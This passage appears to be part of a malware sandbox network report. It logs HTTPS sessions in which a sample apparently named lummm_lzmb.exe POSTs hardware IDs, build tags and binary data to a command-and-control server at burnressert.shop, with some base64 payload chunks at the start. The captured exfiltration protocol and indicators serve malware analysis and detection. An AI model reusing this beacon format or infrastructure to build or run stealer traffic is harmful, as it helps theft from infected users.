2SHS269ZoaF3L480v4cWdpTLANEKOvlWDx7Dr50oGTwJaddZ6h5marcvnTFuQQd2FJqVw4g/u9bJjJH8Hy7NqlojV97tWuTh9e+MtvyF1HYWyEAQmmiq1Esexi+XbM3v2aIRmqhL4vFyPEz1rdFHdxVIQtOJezvWzQpT/l0sS+6b4FKd7Jkm43DvTrI8g9PnxBqCFZptKtgMytQ/TGJMqtzjUBw+nDakpG2OJqvXVvQVykATyDg5lM9PkH4d7Iu
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 31 6a 39 48 62 55 6a 4e 33 78 62 4a 72 30 47 6c 37 65 56 43 4d 44 51 53 37 6f 2b 56 77 7a 4b 55 48 2f 65 4c 55 6f 71 47 69 4c 52 33 32 7a 59 70 69 47 31 72 59 37 33 37 64 54 48 64 68 47 61 6c 63 4f 43 4f 48 67 57 6d 39 68 41 4f 45 39 6f 57 53 76 61 63 59 56 50 4c 70 6c 6b 59 48 63 73 6a 76 5a 35 52 78 62 7a 56 34 6e 42 56 77 6a 35 2b 35 62 4f 54 5a 44 2b 48 57 7a 4b 4c 70 73 68 6b 35 33 2b 69 48 55 6a 4d 6e 78 62 4a 72 55 43 6b 76 56 57 53 59 5a 52 53 6a 76 2f 56 73 6b 65 77 36 2b 59 72 38 31 36 44 32 51 58 57 75 39 63 4e 71 53 6b 62 59 34 6d 71 39 64 57 39 5a 59 4c 51 6c 41 4f 2b 6e 74 57 54 73 79 53 66 70 37 75 79 53 73 59 59 46 49 66 37 5a 6b 6b 34 6a 65 74 54 33 55 2f 68 49 64 6b 52 34 74 46 77 35 78 72 4d 70 4e 4e 7a 64 4e 76 6d 7a 32 50 65 68 69 69 Data Ascii: 1j9HbUjN3xbJr0Gl7eVCMDQS7o+VwzKUH/eLUoqGiLR32zYpiG1rY737dTHdhGalcOCOHgWm9hAOE9oWSvacYVPLplkYHcsjvZ5RxbzV4nBVwj5+5bOTZD+HWzKLpshk53+iHUjMnxbJrUCkvVWSYZRSjv/Vskew6+Yr816D2QXWu9cNqSkbY4mq9dW9ZYLQlAO+ntWTsySfp7uySsYYFIf7Zkk4jetT3U/hIdkR4tFw5xrMpNNzdNvmz2Pehii
2025-01-15 16:25:05 UTC	242	IN	Data Raw: 76 7a 4d 76 78 75 69 4c 66 38 41 73 66 36 6c 30 6b 41 55 6b 2f 72 50 52 70 65 6e 74 42 76 69 75 42 50 65 68 7a 78 68 55 75 39 43 2b 47 79 34 6e 78 63 39 6e 6c 44 31 76 63 53 43 6c 49 63 42 66 4c 2f 56 77 7a 4b 30 66 70 66 50 68 71 36 47 72 47 46 55 58 36 5a 70 4f 51 77 4b 63 35 79 76 42 64 59 70 45 65 4d 6b 38 57 61 64 6e 6f 57 44 6f 38 56 75 38 2b 6e 7a 4b 69 59 70 5a 4b 61 37 55 76 32 73 76 58 38 57 79 4a 75 56 31 5a 7a 68 35 79 58 78 78 79 75 62 67 42 5a 47 6c 66 73 47 72 34 4d 75 67 39 31 41 4d 38 71 43 2f 4d 79 35 61 79 4a 73 6a 78 48 6b 76 63 47 52 51 78 61 54 50 68 37 55 45 6c 42 58 37 35 61 62 55 69 76 33 54 4b 57 48 2b 30 59 5a 4f 64 6b 66 39 30 31 62 64 46 5a 4a 38 57 61 6a 41 41 61 66 53 72 44 6e 51 0d 0a Data Ascii: vzMvxuiLf8Asf6l0kAUk/rPRpentBviuBPehzxhUu9C+Gy4nxc9nlD1vcSClIcBfL/VwzK0fpfPhq6GrGFUX6ZpOQwKc5yvBdYpEeMk8WadnoWDo8Vu8+nzKiYpZKa7Uv2svX8WyJuV1Zzh5yXxxyubgBZGlfsGr4Mug91AM8qC/My5ayJsjxHkvcGRQxaTPh7UElBX75abUiv3TKWH+0YZOdkf901bdFZJ8WajAAafSrDnQ
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 33 32 30 35 0d 0a 4f 51 2f 42 39 76 7a 4b 35 4b 4b 46 58 63 62 78 34 68 63 75 66 38 54 4b 61 72 30 30 54 6e 31 6f 37 54 78 5a 35 76 72 41 44 5a 32 77 51 72 47 7a 32 50 65 68 7a 78 68 55 75 39 43 2b 47 79 34 6e 78 63 39 6e 6c 44 31 76 63 53 43 6c 49 63 42 66 43 37 46 41 78 50 46 43 38 58 62 4d 77 72 79 58 49 44 58 50 36 4e 36 33 4c 6d 66 45 4c 6c 4c 63 46 48 59 63 65 48 77 78 41 4a 2b 76 39 52 33 6b 56 52 2f 68 32 76 7a 54 71 53 34 31 5a 65 2f 6f 68 31 49 32 52 36 57 53 55 74 78 6c 4d 6e 77 5a 36 58 52 56 38 76 37 77 47 5a 69 51 4f 35 7a 4f 75 5a 50 41 33 79 41 31 75 2b 6a 66 55 7a 4e 4b 6a 4a 74 7a 30 43 31 36 59 59 42 51 4d 57 43 54 6a 34 46 63 4b 42 57 37 7a 63 72 73 71 36 6c 53 51 51 47 79 35 61 70 4f 31 37 37 38 7a 7a 76 41 54 57 39 38 65 5a 45 39 42 Data Ascii: 3205OQ/B9vzK5KKFXcbx4hcuf8TKar00Tn1o7TxZ5vrADZ2wQrGz2PehzxhUu9C+Gy4nxc9nlD1vcSClIcBfC7FAxPFC8XbMwryXIDXP6N63LmfELlLcFHYceHwxAJ+v9R3kVR/h2vzTqS41Ze/oh1I2R6WSUtxlMnwZ6XRV8v7wGZiQO5zOuZPA3yA1u+jfUzNKjJtz0C16YYBQMWCTj4FcKBW7zcrsq6lSQQGy5apO1778zzvATW98eZE9B
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 68 30 50 31 47 2b 4b 2b 68 32 38 7a 44 56 47 69 7a 6f 63 4e 71 53 6b 61 64 30 67 71 56 54 48 63 30 65 63 6b 38 4a 4b 76 37 35 55 44 63 74 51 37 6c 4e 68 67 4f 6d 59 6f 64 62 62 4c 64 6a 74 59 6a 41 75 77 72 6b 34 68 35 54 30 56 6b 38 48 67 35 6e 72 4f 51 57 62 41 49 41 74 6a 4f 48 61 75 68 39 78 68 55 38 6a 32 79 61 68 64 61 6e 4a 5a 66 51 45 31 72 65 53 44 6f 43 51 67 6a 76 2b 6c 78 30 64 51 44 34 4d 2b 42 32 35 69 57 43 58 44 7a 69 50 38 62 51 68 4f 4a 6a 69 71 55 43 45 38 59 65 50 45 38 57 65 36 4b 72 52 48 52 6a 41 4c 6c 77 71 6a 61 75 5a 70 42 4f 4f 34 52 52 73 5a 7a 53 6f 54 4c 5a 79 53 4e 32 30 31 67 74 46 55 6b 76 79 73 73 57 65 6e 74 50 76 69 75 42 5a 4f 41 6c 75 51 4d 38 6f 69 2f 4d 79 2b 53 79 4f 74 54 77 43 30 79 53 65 7a 30 4d 58 69 2f 76 71 Data Ascii: h0P1G+K+h28zDVGizocNqSkad0gqVTHc0eck8JKv75UDctQ7lNhgOmYodbbLdjtYjAuwrk4h5T0Vk8Hg5nrOQWbAIAtjOHauh9xhU8j2yahdanJZfQE1reSDoCQgjv+lx0dQD4M+B25iWCXDziP8bQhOJjiqUCE8YePE8We6KrRHRjALlwqjauZpBOO4RRsZzSoTLZySN201gtFUkvyssWentPviuBZOAluQM8oi/My+SyOtTwC0ySez0MXi/vq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:06 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PHOIPRK3552WM55 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18146 Host: burnressert.shop
2025-01-15 16:25:06 UTC	15331	OUT	Data Raw: 2d 2d 50 48 4f 49 50 52 4b 33 35 35 32 57 4d 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 50 48 4f 49 50 52 4b 33 35 35 32 57 4d 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 48 4f 49 50 52 4b 33 35 35 32 57 4d 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 50 48 4f 49 Data Ascii: --PHOIPRK3552WM55Content-Disposition: form-data; name="hwid"D07FA3A9B25E9A5EDA6C202D02A30F20--PHOIPRK3552WM55Content-Disposition: form-data; name="pid"2--PHOIPRK3552WM55Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--PHOI
2025-01-15 16:25:06 UTC	2815	OUT	Data Raw: dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
2025-01-15 16:25:19 UTC	1128	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d7jrbnjk5malf0lu2lv0js60uo; expires=Sun, 11 May 2025 10:11:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2Fz6PuenmCmQgp5Jpa6sOkKgJRnsSPYsOtGV2dr5yr%2F2ziyCfXHDfBtdVWzOHu8WFbfBsNmWJxiWFy1ouubSYGIgyjhACPRZw3l5zU89VOO%2ByJwPItfdCVRao507H7KFP5Dq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90273848ba50a2f8-YUL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17818&min_rtt=17795&rtt_var=6719&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19105&delivery_rate=162402&cwnd=32&unsent_bytes=0&cid=8cb5248c5137c24a&ts=12620&x=0"
2025-01-15 16:25:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 16:25:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:20 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZD3Z1B11LCY5UU31 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8773 Host: burnressert.shop
2025-01-15 16:25:20 UTC	8773	OUT	Data Raw: 2d 2d 5a 44 33 5a 31 42 31 31 4c 43 59 35 55 55 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 5a 44 33 5a 31 42 31 31 4c 43 59 35 55 55 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 44 33 5a 31 42 31 31 4c 43 59 35 55 55 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 5a Data Ascii: --ZD3Z1B11LCY5UU31Content-Disposition: form-data; name="hwid"D07FA3A9B25E9A5EDA6C202D02A30F20--ZD3Z1B11LCY5UU31Content-Disposition: form-data; name="pid"2--ZD3Z1B11LCY5UU31Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--Z
2025-01-15 16:25:20 UTC	1136	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p6hfm6hjkatfjl1i2utedptme1; expires=Sun, 11 May 2025 10:11:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKvRvYjDkH7DxoGLGikEzIScCRDy%2FeprGu%2FBd9U9pnNSDKEVpK7pdEs%2BsYOoTyHRh4yCUZQdnz3vkNGLI87L07jy%2BDyVoTW%2B9hid%2FoZUaOSNyUfnEyK6rKvmaW%2FS%2BSjS8%2Bbo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9027389cc8fdab4b-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14192&min_rtt=14182&rtt_var=5338&sent=5&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9710&delivery_rate=204725&cwnd=32&unsent_bytes=0&cid=d4023c90ebe39636&ts=630&x=0"
2025-01-15 16:25:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 16:25:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:21 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MLZXBBUVVOFF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: burnressert.shop
2025-01-15 16:25:21 UTC	15331	OUT	Data Raw: 2d 2d 4d 4c 5a 58 42 42 55 56 56 4f 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 4d 4c 5a 58 42 42 55 56 56 4f 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 4c 5a 58 42 42 55 56 56 4f 46 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 4d 4c 5a 58 42 42 55 56 56 4f 46 46 0d Data Ascii: --MLZXBBUVVOFFContent-Disposition: form-data; name="hwid"D07FA3A9B25E9A5EDA6C202D02A30F20--MLZXBBUVVOFFContent-Disposition: form-data; name="pid"3--MLZXBBUVVOFFContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--MLZXBBUVVOFF
2025-01-15 16:25:21 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-15 16:25:21 UTC	1128	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f1j0d6nis2nmeib673fk7ejrob; expires=Sun, 11 May 2025 10:12:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqrhoQRr2c24m2tkkHYZuAsbynysOXlhSZOGC49EfRdNc1k4Q8s9Jl11T8P%2FkSsMd3bJmG2hOz5GUs%2BBjBym%2BGL6AnWKAs%2BOVXpXOC4qDrn0ZtKYpY9T1no4tllT3oAr5lP6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738a35e52ac5d-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14176&min_rtt=14173&rtt_var=5322&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21358&delivery_rate=205575&cwnd=32&unsent_bytes=0&cid=29b71315808830c8&ts=764&x=0"
2025-01-15 16:25:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 16:25:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:22 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V18JV9QKDD1Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1394 Host: burnressert.shop
2025-01-15 16:25:22 UTC	1394	OUT	Data Raw: 2d 2d 56 31 38 4a 56 39 51 4b 44 44 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 56 31 38 4a 56 39 51 4b 44 44 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 31 38 4a 56 39 51 4b 44 44 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 56 31 38 4a 56 39 51 4b 44 44 31 51 0d Data Ascii: --V18JV9QKDD1QContent-Disposition: form-data; name="hwid"D07FA3A9B25E9A5EDA6C202D02A30F20--V18JV9QKDD1QContent-Disposition: form-data; name="pid"1--V18JV9QKDD1QContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--V18JV9QKDD1Q
2025-01-15 16:25:23 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sm389m6965ui1fhne64d2empa0; expires=Sun, 11 May 2025 10:12:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7CxZFKTocf%2F7v6lxWghPMqoHfq9n5GuJpPYhgqE0rDNW627rRuL%2BD6W%2B92VqaWPDUUUy19UvZhfOXPH3Dfso7TFRmvmZ4OcJxDmlc8YRaTodnrN8B5XvlqqFke7igEBqkuo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738ad88acebb9-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14185&min_rtt=14181&rtt_var=5326&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2305&delivery_rate=205445&cwnd=32&unsent_bytes=0&cid=f00a49a9f5e75800&ts=362&x=0"
2025-01-15 16:25:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 16:25:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:23 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MMJP71ZYJPJBGM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1085 Host: burnressert.shop
2025-01-15 16:25:23 UTC	1085	OUT	Data Raw: 2d 2d 4d 4d 4a 50 37 31 5a 59 4a 50 4a 42 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 4d 4d 4a 50 37 31 5a 59 4a 50 4a 42 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 4d 4a 50 37 31 5a 59 4a 50 4a 42 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 4d 4d 4a 50 37 31 5a Data Ascii: --MMJP71ZYJPJBGMContent-Disposition: form-data; name="hwid"D07FA3A9B25E9A5EDA6C202D02A30F20--MMJP71ZYJPJBGMContent-Disposition: form-data; name="pid"1--MMJP71ZYJPJBGMContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--MMJP71Z
2025-01-15 16:25:24 UTC	1119	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=trad07ilbg6plv8o1jr4hfhhij; expires=Sun, 11 May 2025 10:12:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RUsGaW5BH1oPPOzRzU7ira7XO4pnRJOtgMbCTip5dwvjsd3VsMX7JQcvIZ18aiELLadLD%2FityufmFsBVnu7f2G6dICxBjjC0yr4Dvb9JF8wn5VsoJVP%2BsFdIz0NCD67c26l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738b34b793afa-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8334&min_rtt=8332&rtt_var=3129&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1998&delivery_rate=349658&cwnd=32&unsent_bytes=0&cid=68c4ae113c67745a&ts=683&x=0"
2025-01-15 16:25:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 16:25:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: burnressert.shop
